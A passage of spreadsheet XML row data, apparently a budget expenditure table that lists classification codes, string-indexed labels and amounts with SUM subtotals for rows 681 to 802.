      <c r="B681" s="705" t="s">
        <v>1438</v>
      </c>
      <c r="C681" s="707">
        <v>267</v>
      </c>
    </row>
    <row r="682" ht="17.1" customHeight="1" spans="1:3">
      <c r="A682" s="705">
        <v>20899</v>
      </c>
      <c r="B682" s="706" t="s">
        <v>1439</v>
      </c>
      <c r="C682" s="269">
        <v>1995</v>
      </c>
    </row>
    <row r="683" ht="17.1" customHeight="1" spans="1:3">
      <c r="A683" s="705">
        <v>2089999</v>
      </c>
      <c r="B683" s="705" t="s">
        <v>1440</v>
      </c>
      <c r="C683" s="707">
        <v>1995</v>
      </c>
    </row>
    <row r="684" ht="17.1" customHeight="1" spans="1:3">
      <c r="A684" s="705">
        <v>210</v>
      </c>
      <c r="B684" s="706" t="s">
        <v>1441</v>
      </c>
      <c r="C684" s="269">
        <v>41556</v>
      </c>
    </row>
    <row r="685" ht="17.1" customHeight="1" spans="1:3">
      <c r="A685" s="705">
        <v>21001</v>
      </c>
      <c r="B685" s="706" t="s">
        <v>1442</v>
      </c>
      <c r="C685" s="269">
        <f>SUM(C686:C689)</f>
        <v>514</v>
      </c>
    </row>
    <row r="686" ht="17.1" customHeight="1" spans="1:3">
      <c r="A686" s="705">
        <v>2100101</v>
      </c>
      <c r="B686" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C686" s="707">
        <v>494</v>
      </c>
    </row>
    <row r="687" ht="17.1" customHeight="1" spans="1:3">
      <c r="A687" s="705">
        <v>2100102</v>
      </c>
      <c r="B687" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C687" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="688" ht="17.1" customHeight="1" spans="1:3">
      <c r="A688" s="705">
        <v>2100103</v>
      </c>
      <c r="B688" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C688" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="689" ht="17.1" customHeight="1" spans="1:3">
      <c r="A689" s="705">
        <v>2100199</v>
      </c>
      <c r="B689" s="705" t="s">
        <v>1443</v>
      </c>
      <c r="C689" s="707">
        <v>20</v>
      </c>
    </row>
    <row r="690" ht="17.1" customHeight="1" spans="1:3">
      <c r="A690" s="705">
        <v>21002</v>
      </c>
      <c r="B690" s="706" t="s">
        <v>1444</v>
      </c>
      <c r="C690" s="269">
        <v>790</v>
      </c>
    </row>
    <row r="691" ht="17.1" customHeight="1" spans="1:3">
      <c r="A691" s="705">
        <v>2100201</v>
      </c>
      <c r="B691" s="705" t="s">
        <v>1445</v>
      </c>
      <c r="C691" s="707">
        <v>790</v>
      </c>
    </row>
    <row r="692" ht="17.1" customHeight="1" spans="1:3">
      <c r="A692" s="705">
        <v>2100202</v>
      </c>
      <c r="B692" s="705" t="s">
        <v>1446</v>
      </c>
      <c r="C692" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="17.1" customHeight="1" spans="1:3">
      <c r="A693" s="705">
        <v>2100203</v>
      </c>
      <c r="B693" s="705" t="s">
        <v>1447</v>
      </c>
      <c r="C693" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="17.1" customHeight="1" spans="1:3">
      <c r="A694" s="705">
        <v>2100204</v>
      </c>
      <c r="B694" s="705" t="s">
        <v>1448</v>
      </c>
      <c r="C694" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="17.1" customHeight="1" spans="1:3">
      <c r="A695" s="705">
        <v>2100205</v>
      </c>
      <c r="B695" s="705" t="s">
        <v>1449</v>
      </c>
      <c r="C695" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="17.1" customHeight="1" spans="1:3">
      <c r="A696" s="705">
        <v>2100206</v>
      </c>
      <c r="B696" s="705" t="s">
        <v>1450</v>
      </c>
      <c r="C696" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="697" ht="17.1" customHeight="1" spans="1:3">
      <c r="A697" s="705">
        <v>2100207</v>
      </c>
      <c r="B697" s="705" t="s">
        <v>1451</v>
      </c>
      <c r="C697" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="698" ht="17.1" customHeight="1" spans="1:3">
      <c r="A698" s="705">
        <v>2100208</v>
      </c>
      <c r="B698" s="705" t="s">
        <v>1452</v>
      </c>
      <c r="C698" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="699" ht="17.1" customHeight="1" spans="1:3">
      <c r="A699" s="705">
        <v>2100209</v>
      </c>
      <c r="B699" s="705" t="s">
        <v>1453</v>
      </c>
      <c r="C699" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="700" ht="17.1" customHeight="1" spans="1:3">
      <c r="A700" s="705">
        <v>2100210</v>
      </c>
      <c r="B700" s="705" t="s">
        <v>1454</v>
      </c>
      <c r="C700" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="701" ht="17.1" customHeight="1" spans="1:3">
      <c r="A701" s="705">
        <v>2100211</v>
      </c>
      <c r="B701" s="705" t="s">
        <v>1455</v>
      </c>
      <c r="C701" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="702" ht="17.1" customHeight="1" spans="1:3">
      <c r="A702" s="705">
        <v>2100212</v>
      </c>
      <c r="B702" s="705" t="s">
        <v>1456</v>
      </c>
      <c r="C702" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="703" ht="17.1" customHeight="1" spans="1:3">
      <c r="A703" s="705">
        <v>2100213</v>
      </c>
      <c r="B703" s="705" t="s">
        <v>1457</v>
      </c>
      <c r="C703" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="704" ht="17.1" customHeight="1" spans="1:3">
      <c r="A704" s="705">
        <v>2100299</v>
      </c>
      <c r="B704" s="705" t="s">
        <v>1458</v>
      </c>
      <c r="C704" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="17.1" customHeight="1" spans="1:3">
      <c r="A705" s="705">
        <v>21003</v>
      </c>
      <c r="B705" s="706" t="s">
        <v>1459</v>
      </c>
      <c r="C705" s="269">
        <f>SUM(C706:C708)</f>
        <v>5268</v>
      </c>
    </row>
    <row r="706" ht="17.1" customHeight="1" spans="1:3">
      <c r="A706" s="705">
        <v>2100301</v>
      </c>
      <c r="B706" s="705" t="s">
        <v>1460</v>
      </c>
      <c r="C706" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="17.1" customHeight="1" spans="1:3">
      <c r="A707" s="705">
        <v>2100302</v>
      </c>
      <c r="B707" s="705" t="s">
        <v>1461</v>
      </c>
      <c r="C707" s="707">
        <v>5000</v>
      </c>
    </row>
    <row r="708" ht="17.1" customHeight="1" spans="1:3">
      <c r="A708" s="705">
        <v>2100399</v>
      </c>
      <c r="B708" s="705" t="s">
        <v>1462</v>
      </c>
      <c r="C708" s="707">
        <v>268</v>
      </c>
    </row>
    <row r="709" ht="17.1" customHeight="1" spans="1:3">
      <c r="A709" s="705">
        <v>21004</v>
      </c>
      <c r="B709" s="706" t="s">
        <v>1463</v>
      </c>
      <c r="C709" s="269">
        <f>SUM(C710:C720)</f>
        <v>7012</v>
      </c>
    </row>
    <row r="710" ht="17.1" customHeight="1" spans="1:3">
      <c r="A710" s="705">
        <v>2100401</v>
      </c>
      <c r="B710" s="705" t="s">
        <v>1464</v>
      </c>
      <c r="C710" s="707">
        <v>1350</v>
      </c>
    </row>
    <row r="711" ht="17.1" customHeight="1" spans="1:3">
      <c r="A711" s="705">
        <v>2100402</v>
      </c>
      <c r="B711" s="705" t="s">
        <v>1465</v>
      </c>
      <c r="C711" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="17.1" customHeight="1" spans="1:3">
      <c r="A712" s="705">
        <v>2100403</v>
      </c>
      <c r="B712" s="705" t="s">
        <v>1466</v>
      </c>
      <c r="C712" s="707">
        <v>562</v>
      </c>
    </row>
    <row r="713" ht="17.1" customHeight="1" spans="1:3">
      <c r="A713" s="705">
        <v>2100404</v>
      </c>
      <c r="B713" s="705" t="s">
        <v>1467</v>
      </c>
      <c r="C713" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="17.1" customHeight="1" spans="1:3">
      <c r="A714" s="705">
        <v>2100405</v>
      </c>
      <c r="B714" s="705" t="s">
        <v>1468</v>
      </c>
      <c r="C714" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="17.1" customHeight="1" spans="1:3">
      <c r="A715" s="705">
        <v>2100406</v>
      </c>
      <c r="B715" s="705" t="s">
        <v>1469</v>
      </c>
      <c r="C715" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="716" ht="17.1" customHeight="1" spans="1:3">
      <c r="A716" s="705">
        <v>2100407</v>
      </c>
      <c r="B716" s="705" t="s">
        <v>1470</v>
      </c>
      <c r="C716" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="717" ht="17.1" customHeight="1" spans="1:3">
      <c r="A717" s="705">
        <v>2100408</v>
      </c>
      <c r="B717" s="705" t="s">
        <v>1471</v>
      </c>
      <c r="C717" s="707">
        <v>4886</v>
      </c>
    </row>
    <row r="718" ht="17.1" customHeight="1" spans="1:3">
      <c r="A718" s="705">
        <v>2100409</v>
      </c>
      <c r="B718" s="705" t="s">
        <v>1472</v>
      </c>
      <c r="C718" s="707">
        <v>70</v>
      </c>
    </row>
    <row r="719" ht="17.1" customHeight="1" spans="1:3">
      <c r="A719" s="705">
        <v>2100410</v>
      </c>
      <c r="B719" s="705" t="s">
        <v>1473</v>
      </c>
      <c r="C719" s="707">
        <v>124</v>
      </c>
    </row>
    <row r="720" ht="17.1" customHeight="1" spans="1:3">
      <c r="A720" s="705">
        <v>2100499</v>
      </c>
      <c r="B720" s="705" t="s">
        <v>1474</v>
      </c>
      <c r="C720" s="707">
        <v>20</v>
      </c>
    </row>
    <row r="721" ht="17.1" customHeight="1" spans="1:3">
      <c r="A721" s="705">
        <v>21006</v>
      </c>
      <c r="B721" s="706" t="s">
        <v>1475</v>
      </c>
      <c r="C721" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="722" ht="17.1" customHeight="1" spans="1:3">
      <c r="A722" s="705">
        <v>2100601</v>
      </c>
      <c r="B722" s="705" t="s">
        <v>1476</v>
      </c>
      <c r="C722" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="723" ht="17.1" customHeight="1" spans="1:3">
      <c r="A723" s="705">
        <v>2100699</v>
      </c>
      <c r="B723" s="705" t="s">
        <v>1477</v>
      </c>
      <c r="C723" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="724" ht="17.1" customHeight="1" spans="1:3">
      <c r="A724" s="705">
        <v>21007</v>
      </c>
      <c r="B724" s="706" t="s">
        <v>1478</v>
      </c>
      <c r="C724" s="269">
        <f>SUM(C725:C727)</f>
        <v>7297</v>
      </c>
    </row>
    <row r="725" ht="17.1" customHeight="1" spans="1:3">
      <c r="A725" s="705">
        <v>2100716</v>
      </c>
      <c r="B725" s="705" t="s">
        <v>1479</v>
      </c>
      <c r="C725" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="726" ht="17.1" customHeight="1" spans="1:3">
      <c r="A726" s="705">
        <v>2100717</v>
      </c>
      <c r="B726" s="705" t="s">
        <v>1480</v>
      </c>
      <c r="C726" s="707">
        <v>7240</v>
      </c>
    </row>
    <row r="727" ht="17.1" customHeight="1" spans="1:3">
      <c r="A727" s="705">
        <v>2100799</v>
      </c>
      <c r="B727" s="705" t="s">
        <v>1481</v>
      </c>
      <c r="C727" s="707">
        <v>57</v>
      </c>
    </row>
    <row r="728" ht="17.1" customHeight="1" spans="1:3">
      <c r="A728" s="705">
        <v>21011</v>
      </c>
      <c r="B728" s="706" t="s">
        <v>1482</v>
      </c>
      <c r="C728" s="269">
        <f>SUM(C729:C732)</f>
        <v>11194</v>
      </c>
    </row>
    <row r="729" ht="17.1" customHeight="1" spans="1:3">
      <c r="A729" s="705">
        <v>2101101</v>
      </c>
      <c r="B729" s="705" t="s">
        <v>1483</v>
      </c>
      <c r="C729" s="707">
        <v>4100</v>
      </c>
    </row>
    <row r="730" ht="17.1" customHeight="1" spans="1:3">
      <c r="A730" s="705">
        <v>2101102</v>
      </c>
      <c r="B730" s="705" t="s">
        <v>1484</v>
      </c>
      <c r="C730" s="707">
        <v>6990</v>
      </c>
    </row>
    <row r="731" ht="17.1" customHeight="1" spans="1:3">
      <c r="A731" s="705">
        <v>2101103</v>
      </c>
      <c r="B731" s="705" t="s">
        <v>1485</v>
      </c>
      <c r="C731" s="707">
        <v>100</v>
      </c>
    </row>
    <row r="732" ht="17.1" customHeight="1" spans="1:3">
      <c r="A732" s="705">
        <v>2101199</v>
      </c>
      <c r="B732" s="705" t="s">
        <v>1486</v>
      </c>
      <c r="C732" s="707">
        <v>4</v>
      </c>
    </row>
    <row r="733" ht="17.1" customHeight="1" spans="1:3">
      <c r="A733" s="705">
        <v>21012</v>
      </c>
      <c r="B733" s="706" t="s">
        <v>1487</v>
      </c>
      <c r="C733" s="269">
        <v>3168</v>
      </c>
    </row>
    <row r="734" ht="17.1" customHeight="1" spans="1:3">
      <c r="A734" s="705">
        <v>2101201</v>
      </c>
      <c r="B734" s="705" t="s">
        <v>1488</v>
      </c>
      <c r="C734" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="735" ht="17.1" customHeight="1" spans="1:3">
      <c r="A735" s="705">
        <v>2101202</v>
      </c>
      <c r="B735" s="705" t="s">
        <v>1489</v>
      </c>
      <c r="C735" s="707">
        <v>3168</v>
      </c>
    </row>
    <row r="736" ht="17.1" customHeight="1" spans="1:3">
      <c r="A736" s="705">
        <v>2101299</v>
      </c>
      <c r="B736" s="705" t="s">
        <v>1490</v>
      </c>
      <c r="C736" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="737" ht="17.1" customHeight="1" spans="1:3">
      <c r="A737" s="705">
        <v>21013</v>
      </c>
      <c r="B737" s="706" t="s">
        <v>1491</v>
      </c>
      <c r="C737" s="269">
        <f>SUM(C738:C740)</f>
        <v>3168</v>
      </c>
    </row>
    <row r="738" ht="17.1" customHeight="1" spans="1:3">
      <c r="A738" s="705">
        <v>2101301</v>
      </c>
      <c r="B738" s="705" t="s">
        <v>1492</v>
      </c>
      <c r="C738" s="707">
        <v>2508</v>
      </c>
    </row>
    <row r="739" ht="17.1" customHeight="1" spans="1:3">
      <c r="A739" s="705">
        <v>2101302</v>
      </c>
      <c r="B739" s="705" t="s">
        <v>1493</v>
      </c>
      <c r="C739" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="740" ht="17.1" customHeight="1" spans="1:3">
      <c r="A740" s="705">
        <v>2101399</v>
      </c>
      <c r="B740" s="705" t="s">
        <v>1494</v>
      </c>
      <c r="C740" s="707">
        <v>660</v>
      </c>
    </row>
    <row r="741" ht="17.1" customHeight="1" spans="1:3">
      <c r="A741" s="705">
        <v>21014</v>
      </c>
      <c r="B741" s="706" t="s">
        <v>1495</v>
      </c>
      <c r="C741" s="269">
        <f>C742+C743</f>
        <v>765</v>
      </c>
    </row>
    <row r="742" ht="17.1" customHeight="1" spans="1:3">
      <c r="A742" s="705">
        <v>2101401</v>
      </c>
      <c r="B742" s="705" t="s">
        <v>1496</v>
      </c>
      <c r="C742" s="707">
        <v>761</v>
      </c>
    </row>
    <row r="743" ht="17.1" customHeight="1" spans="1:3">
      <c r="A743" s="705">
        <v>2101499</v>
      </c>
      <c r="B743" s="705" t="s">
        <v>1497</v>
      </c>
      <c r="C743" s="707">
        <v>4</v>
      </c>
    </row>
    <row r="744" ht="17.1" customHeight="1" spans="1:3">
      <c r="A744" s="705">
        <v>21015</v>
      </c>
      <c r="B744" s="706" t="s">
        <v>1498</v>
      </c>
      <c r="C744" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="745" ht="17.1" customHeight="1" spans="1:3">
      <c r="A745" s="705">
        <v>2101501</v>
      </c>
      <c r="B745" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C745" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="746" ht="17.1" customHeight="1" spans="1:3">
      <c r="A746" s="705">
        <v>2101502</v>
      </c>
      <c r="B746" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C746" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="747" ht="17.1" customHeight="1" spans="1:3">
      <c r="A747" s="705">
        <v>2101503</v>
      </c>
      <c r="B747" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C747" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="748" ht="17.1" customHeight="1" spans="1:3">
      <c r="A748" s="705">
        <v>2101504</v>
      </c>
      <c r="B748" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C748" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="749" ht="17.1" customHeight="1" spans="1:3">
      <c r="A749" s="705">
        <v>2101505</v>
      </c>
      <c r="B749" s="705" t="s">
        <v>1499</v>
      </c>
      <c r="C749" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="750" ht="17.1" customHeight="1" spans="1:3">
      <c r="A750" s="705">
        <v>2101506</v>
      </c>
      <c r="B750" s="705" t="s">
        <v>1500</v>
      </c>
      <c r="C750" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="751" ht="17.1" customHeight="1" spans="1:3">
      <c r="A751" s="705">
        <v>2101550</v>
      </c>
      <c r="B751" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C751" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="752" ht="17.1" customHeight="1" spans="1:3">
      <c r="A752" s="705">
        <v>2101599</v>
      </c>
      <c r="B752" s="705" t="s">
        <v>1501</v>
      </c>
      <c r="C752" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="753" ht="17.1" customHeight="1" spans="1:3">
      <c r="A753" s="705">
        <v>21016</v>
      </c>
      <c r="B753" s="706" t="s">
        <v>1502</v>
      </c>
      <c r="C753" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="754" ht="17.1" customHeight="1" spans="1:3">
      <c r="A754" s="705">
        <v>2101601</v>
      </c>
      <c r="B754" s="705" t="s">
        <v>1503</v>
      </c>
      <c r="C754" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="755" ht="17.1" customHeight="1" spans="1:3">
      <c r="A755" s="705">
        <v>21019</v>
      </c>
      <c r="B755" s="706" t="s">
        <v>1504</v>
      </c>
      <c r="C755" s="269">
        <v>2372</v>
      </c>
    </row>
    <row r="756" ht="17.1" customHeight="1" spans="1:3">
      <c r="A756" s="705">
        <v>2101999</v>
      </c>
      <c r="B756" s="709" t="s">
        <v>1505</v>
      </c>
      <c r="C756" s="707">
        <v>2372</v>
      </c>
    </row>
    <row r="757" ht="17.1" customHeight="1" spans="1:3">
      <c r="A757" s="705">
        <v>21099</v>
      </c>
      <c r="B757" s="706" t="s">
        <v>1506</v>
      </c>
      <c r="C757" s="269">
        <v>8</v>
      </c>
    </row>
    <row r="758" ht="17.1" customHeight="1" spans="1:3">
      <c r="A758" s="705">
        <v>2109999</v>
      </c>
      <c r="B758" s="705" t="s">
        <v>1507</v>
      </c>
      <c r="C758" s="707">
        <v>8</v>
      </c>
    </row>
    <row r="759" ht="17.1" customHeight="1" spans="1:3">
      <c r="A759" s="705">
        <v>211</v>
      </c>
      <c r="B759" s="706" t="s">
        <v>1508</v>
      </c>
      <c r="C759" s="269">
        <v>3075</v>
      </c>
    </row>
    <row r="760" ht="17.1" customHeight="1" spans="1:3">
      <c r="A760" s="705">
        <v>21101</v>
      </c>
      <c r="B760" s="706" t="s">
        <v>1509</v>
      </c>
      <c r="C760" s="269">
        <v>391</v>
      </c>
    </row>
    <row r="761" ht="17.1" customHeight="1" spans="1:3">
      <c r="A761" s="705">
        <v>2110101</v>
      </c>
      <c r="B761" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C761" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="762" ht="17.1" customHeight="1" spans="1:3">
      <c r="A762" s="705">
        <v>2110102</v>
      </c>
      <c r="B762" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C762" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="763" ht="17.1" customHeight="1" spans="1:3">
      <c r="A763" s="705">
        <v>2110103</v>
      </c>
      <c r="B763" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C763" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="764" ht="17.1" customHeight="1" spans="1:3">
      <c r="A764" s="705">
        <v>2110104</v>
      </c>
      <c r="B764" s="705" t="s">
        <v>1510</v>
      </c>
      <c r="C764" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="17.1" customHeight="1" spans="1:3">
      <c r="A765" s="705">
        <v>2110105</v>
      </c>
      <c r="B765" s="705" t="s">
        <v>1511</v>
      </c>
      <c r="C765" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="766" ht="17.1" customHeight="1" spans="1:3">
      <c r="A766" s="705">
        <v>2110106</v>
      </c>
      <c r="B766" s="705" t="s">
        <v>1512</v>
      </c>
      <c r="C766" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="17.1" customHeight="1" spans="1:3">
      <c r="A767" s="705">
        <v>2110107</v>
      </c>
      <c r="B767" s="705" t="s">
        <v>1513</v>
      </c>
      <c r="C767" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="17.1" customHeight="1" spans="1:3">
      <c r="A768" s="705">
        <v>2110108</v>
      </c>
      <c r="B768" s="705" t="s">
        <v>1514</v>
      </c>
      <c r="C768" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="17.1" customHeight="1" spans="1:3">
      <c r="A769" s="705">
        <v>2110199</v>
      </c>
      <c r="B769" s="705" t="s">
        <v>1515</v>
      </c>
      <c r="C769" s="707">
        <v>391</v>
      </c>
    </row>
    <row r="770" ht="17.1" customHeight="1" spans="1:3">
      <c r="A770" s="705">
        <v>21102</v>
      </c>
      <c r="B770" s="706" t="s">
        <v>1516</v>
      </c>
      <c r="C770" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="17.1" customHeight="1" spans="1:3">
      <c r="A771" s="705">
        <v>2110203</v>
      </c>
      <c r="B771" s="705" t="s">
        <v>1517</v>
      </c>
      <c r="C771" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="772" ht="17.1" customHeight="1" spans="1:3">
      <c r="A772" s="705">
        <v>2110204</v>
      </c>
      <c r="B772" s="705" t="s">
        <v>1518</v>
      </c>
      <c r="C772" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="773" ht="17.1" customHeight="1" spans="1:3">
      <c r="A773" s="705">
        <v>2110299</v>
      </c>
      <c r="B773" s="705" t="s">
        <v>1519</v>
      </c>
      <c r="C773" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="774" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A774" s="705">
        <v>21103</v>
      </c>
      <c r="B774" s="706" t="s">
        <v>1520</v>
      </c>
      <c r="C774" s="269">
        <f>SUM(C775:C782)</f>
        <v>1818</v>
      </c>
    </row>
    <row r="775" ht="17.1" customHeight="1" spans="1:3">
      <c r="A775" s="705">
        <v>2110301</v>
      </c>
      <c r="B775" s="705" t="s">
        <v>1521</v>
      </c>
      <c r="C775" s="707">
        <v>1790</v>
      </c>
    </row>
    <row r="776" ht="17.1" customHeight="1" spans="1:3">
      <c r="A776" s="705">
        <v>2110302</v>
      </c>
      <c r="B776" s="705" t="s">
        <v>1522</v>
      </c>
      <c r="C776" s="707">
        <v>28</v>
      </c>
    </row>
    <row r="777" ht="17.1" customHeight="1" spans="1:3">
      <c r="A777" s="705">
        <v>2110303</v>
      </c>
      <c r="B777" s="705" t="s">
        <v>1523</v>
      </c>
      <c r="C777" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="778" ht="17.1" customHeight="1" spans="1:3">
      <c r="A778" s="705">
        <v>2110304</v>
      </c>
      <c r="B778" s="705" t="s">
        <v>1524</v>
      </c>
      <c r="C778" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="779" ht="17.1" customHeight="1" spans="1:3">
      <c r="A779" s="705">
        <v>2110305</v>
      </c>
      <c r="B779" s="705" t="s">
        <v>1525</v>
      </c>
      <c r="C779" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="780" ht="17.1" customHeight="1" spans="1:3">
      <c r="A780" s="705">
        <v>2110306</v>
      </c>
      <c r="B780" s="705" t="s">
        <v>1526</v>
      </c>
      <c r="C780" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="17.1" customHeight="1" spans="1:3">
      <c r="A781" s="705">
        <v>2110307</v>
      </c>
      <c r="B781" s="705" t="s">
        <v>1527</v>
      </c>
      <c r="C781" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="17.1" customHeight="1" spans="1:3">
      <c r="A782" s="705">
        <v>2110399</v>
      </c>
      <c r="B782" s="705" t="s">
        <v>1528</v>
      </c>
      <c r="C782" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="17.1" customHeight="1" spans="1:3">
      <c r="A783" s="705">
        <v>21104</v>
      </c>
      <c r="B783" s="706" t="s">
        <v>1529</v>
      </c>
      <c r="C783" s="269">
        <f>SUM(C784:C789)</f>
        <v>249</v>
      </c>
    </row>
    <row r="784" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A784" s="705">
        <v>2110401</v>
      </c>
      <c r="B784" s="705" t="s">
        <v>1530</v>
      </c>
      <c r="C784" s="707">
        <v>215</v>
      </c>
    </row>
    <row r="785" ht="17.1" customHeight="1" spans="1:3">
      <c r="A785" s="705">
        <v>2110402</v>
      </c>
      <c r="B785" s="705" t="s">
        <v>1531</v>
      </c>
      <c r="C785" s="707">
        <v>19</v>
      </c>
    </row>
    <row r="786" ht="17.1" customHeight="1" spans="1:3">
      <c r="A786" s="705">
        <v>2110404</v>
      </c>
      <c r="B786" s="705" t="s">
        <v>1532</v>
      </c>
      <c r="C786" s="707">
        <v>15</v>
      </c>
    </row>
    <row r="787" ht="17.1" customHeight="1" spans="1:3">
      <c r="A787" s="705">
        <v>2110405</v>
      </c>
      <c r="B787" s="705" t="s">
        <v>1533</v>
      </c>
      <c r="C787" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="788" ht="17.1" customHeight="1" spans="1:3">
      <c r="A788" s="705">
        <v>2110406</v>
      </c>
      <c r="B788" s="705" t="s">
        <v>1534</v>
      </c>
      <c r="C788" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="789" ht="17.1" customHeight="1" spans="1:3">
      <c r="A789" s="705">
        <v>2110499</v>
      </c>
      <c r="B789" s="705" t="s">
        <v>1535</v>
      </c>
      <c r="C789" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="17.1" customHeight="1" spans="1:3">
      <c r="A790" s="705">
        <v>21105</v>
      </c>
      <c r="B790" s="706" t="s">
        <v>1536</v>
      </c>
      <c r="C790" s="269">
        <v>205</v>
      </c>
    </row>
    <row r="791" ht="17.1" customHeight="1" spans="1:3">
      <c r="A791" s="705">
        <v>2110501</v>
      </c>
      <c r="B791" s="705" t="s">
        <v>1537</v>
      </c>
      <c r="C791" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="17.1" customHeight="1" spans="1:3">
      <c r="A792" s="705">
        <v>2110502</v>
      </c>
      <c r="B792" s="705" t="s">
        <v>1538</v>
      </c>
      <c r="C792" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="17.1" customHeight="1" spans="1:3">
      <c r="A793" s="705">
        <v>2110503</v>
      </c>
      <c r="B793" s="705" t="s">
        <v>1539</v>
      </c>
      <c r="C793" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="17.1" customHeight="1" spans="1:3">
      <c r="A794" s="705">
        <v>2110506</v>
      </c>
      <c r="B794" s="705" t="s">
        <v>1540</v>
      </c>
      <c r="C794" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="17.1" customHeight="1" spans="1:3">
      <c r="A795" s="705">
        <v>2110507</v>
      </c>
      <c r="B795" s="705" t="s">
        <v>1541</v>
      </c>
      <c r="C795" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="17.1" customHeight="1" spans="1:3">
      <c r="A796" s="705">
        <v>2110599</v>
      </c>
      <c r="B796" s="705" t="s">
        <v>1542</v>
      </c>
      <c r="C796" s="707">
        <v>205</v>
      </c>
    </row>
    <row r="797" ht="17.1" customHeight="1" spans="1:3">
      <c r="A797" s="705">
        <v>21106</v>
      </c>
      <c r="B797" s="706" t="s">
        <v>1543</v>
      </c>
      <c r="C797" s="269">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="17.1" customHeight="1" spans="1:3">
      <c r="A798" s="705">
        <v>2110602</v>
      </c>
      <c r="B798" s="705" t="s">
        <v>1544</v>
      </c>
      <c r="C798" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="17.1" customHeight="1" spans="1:3">
      <c r="A799" s="705">
        <v>2110603</v>
      </c>
      <c r="B799" s="705" t="s">
        <v>1545</v>
      </c>
      <c r="C799" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="17.1" customHeight="1" spans="1:3">
      <c r="A800" s="705">
        <v>2110604</v>
      </c>
      <c r="B800" s="705" t="s">
        <v>1546</v>
      </c>
      <c r="C800" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="17.1" customHeight="1" spans="1:3">
      <c r="A801" s="705">
        <v>2110605</v>
      </c>
      <c r="B801" s="705" t="s">
        <v>1547</v>
      </c>
      <c r="C801" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="17.1" customHeight="1" spans="1:3">
      <c r="A802" s="705">
        <v>2110699</v>
      </c>
      <c r="B802" s="705" t="s">
        <v>1548</v>
      </c>
      <c r="C802" s="707">
        <v>0</v>
      </c>
    </row>
